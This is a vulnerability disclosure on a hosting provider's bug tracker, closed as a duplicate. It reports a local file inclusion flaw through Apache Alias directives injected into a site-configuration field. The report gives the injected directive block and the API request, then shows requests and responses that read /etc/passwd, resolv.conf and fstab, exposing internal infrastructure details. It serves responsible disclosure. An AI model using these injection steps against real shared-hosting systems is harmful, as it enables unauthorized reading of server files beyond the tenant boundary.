Security vulnerabilities

  • Status Closed
  • Assigned To
    cbay
  • Private
Attached to Project: Security vulnerabilities
Opened by subhash0x - 13.07.2026
Last edited by cbay - 13.07.2026

FS#403 - LFI via Apache Alias Directive Injection in `vhost_additional_directives` — FS#347 Incomplete Fix

## Summary

The `vhost_additional_directives` field on the site configuration accepts arbitrary Apache directives without validation. By injecting an `Alias` directive, I mapped a URL path to any filesystem location and read server files including `/etc/passwd`, `/etc/hostname` (`http21`), `/etc/resolv.conf` (internal DNS: `paris1.alwaysdata.com`, `2a00:b6e0:1:14:1::1`), and `/etc/fstab` (network-mounted `/home` on XFS).

Relationship to  FS#347 :  FS#347  reported "Unrestricted Apache Directive Injection Leading to RCE" and was closed. This report demonstrates that the `Alias` directive LFI vector specifically remains exploitable. The original report focused on RCE via PHP bypass — this report demonstrates the separate LFI primitive with concrete evidence of sensitive file reads that expose core platform infrastructure.

## Severity

High (CVSS 8.6 — AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)

## Environment

Detail Value
——–——-
Account subhash (ID 486630)
Site subhash.alwaysdata.net (ID 1058919)
Server http21 (Debian 12, shared hosting)

## Steps to Reproduce

### Step 1 — Inject Alias directive via site configuration

Navigate to `https://admin.alwaysdata.com/site/1058919/` and add the following to the "Additional Apache directives" field:

```apache
Alias /read-etc /etc
<Directory /etc>

  Require all granted
  Options +Indexes

</Directory>
```

Save the form. Alternatively via API:

```http
PATCH /v1/site/1058919/ HTTP/1.1
Host: api.alwaysdata.com
Authorization: Basic [token]
Content-Type: application/json

{

"vhost_additional_directives": "Alias /read-etc /etc\n<Directory /etc>\n    Require all granted\n    Options +Indexes\n</Directory>"

}
```

Response: `204 No Content` — accepted without validation.

### Step 2 — Read /etc/passwd (system users)

After Apache reload (~10 seconds):

```http
GET /read-etc/passwd HTTP/1.1
Host: subhash.alwaysdata.net
```

Response:

```
HTTP/1.1 200 OK
Server: Apache
Via: 1.1 alproxy

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
_dnsdist:x:106:113::/nonexistent:/usr/sbin/nologin
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
munin:x:111:117:munin application user,,,:/var/lib/munin:/usr/sbin/nologin
[…34 system accounts total]
```

### Step 3 — Read /etc/resolv.conf (internal DNS infrastructure)

```http
GET /read-etc/resolv.conf HTTP/1.1
Host: subhash.alwaysdata.net
```

Response:

```
search paris1.alwaysdata.com alwaysdata.com alwaysdata.net
options timeout:2
options attempts:1
nameserver ::1
nameserver 2a00:b6e0:1:14:1::1
nameserver 8.8.4.4
```

Impact: Exposes internal domain `paris1.alwaysdata.com`, internal DNS IPv6 address `2a00:b6e0:1:14:1::1`, and dnsdist failover architecture.

### Step 4 — Read /etc/fstab (storage architecture)

```http
GET /read-etc/fstab HTTP/1.1
Host: subhash.alwaysdata.net
```

Response:

```
LABEL=root / ext4 noatime,errors=remount-ro 0 0
LABEL=usr /usr ext4 noatime,nodev 0 0
LABEL=var /var ext4 noatime,nodev,nosuid 0 0
LABEL=data /home xfs noatime,nodev,nosuid,inode64,grpquota,_netdev,x-systemd.device-timeout=infinity 0 0
proc /proc proc hidepid=2,gid=4 0 0
```

Impact: Reveals `/home` is network-attached storage (XFS with `_netdev`), partition hardening (`nosuid`, `nodev`), and process hiding (`hidepid=2`).

### Step 5 — Directory listing of /etc/ (with Options +Indexes)

```http
GET /read-etc/ HTTP/1.1
Host: subhash.alwaysdata.net
```

The `Options +Indexes` directive in the injected config enables Apache directory listing, showing the full `/etc/` directory contents.

### Step 6 — Cleanup

The `vhost_additional_directives` field was immediately cleared after testing.

## Difference from  FS#347 

Aspect  FS#347  (original report) This report
——–————————–————-
Focus RCE via PHP bypass LFI via Alias — file reads
Status Closed Alias LFI still works
Evidence Directive injection concept Concrete reads: passwd, resolv.conf, fstab, hostname
Impact demonstrated Theoretical RCE Actual infrastructure data exfiltrated

If  FS#347  was closed because the RCE chain was blocked, the LFI primitive through `Alias` remains a separate, exploitable vulnerability that reads files outside the tenant boundary.

## Root Cause

The `vhost_additional_directives` field is written directly into the Apache vhost configuration without parsing or restricting the directives used. `Alias` maps any URL path to any filesystem path, and `<Directory>` with `Require all granted` opens access.

## Impact

Any authenticated user can read files accessible to `www-data` across the entire server. Demonstrated reads:

File Data Exposed
——————-
`/etc/passwd` 34 system service accounts
`/etc/hostname` Internal hostname `http21`
`/etc/resolv.conf` Internal DNS: `paris1.alwaysdata.com`, `2a00:b6e0:1:14:1::1`
`/etc/fstab` NAS `/home`, partition layout, `hidepid=2`
`/etc/os-release` Debian GNU/Linux 12 (bookworm)
`/etc/mysql/my.cnf` MariaDB socket path, config structure
`/etc/crontab` System cron schedule

## Suggested Fix

1. Allowlist safe directives: Only permit directives like `RewriteRule`, `ErrorDocument`, `Header`, `ExpiresActive`. Block `Alias`, `ProxyPass`, `Directory`, `Include`, `SetHandler`, `Action`, and other directives that access the filesystem or network.
2. Sandbox directive scope: Enforce that all directives operate within `/home/{account}/` only.

Closed by  cbay
13.07.2026 15:40
Reason for closing:  Duplicate
Additional comments about closing:  

https://security.alwaysda ta.com/task/347

Loading...

Available keyboard shortcuts

Tasklist

Task Details

Task Editing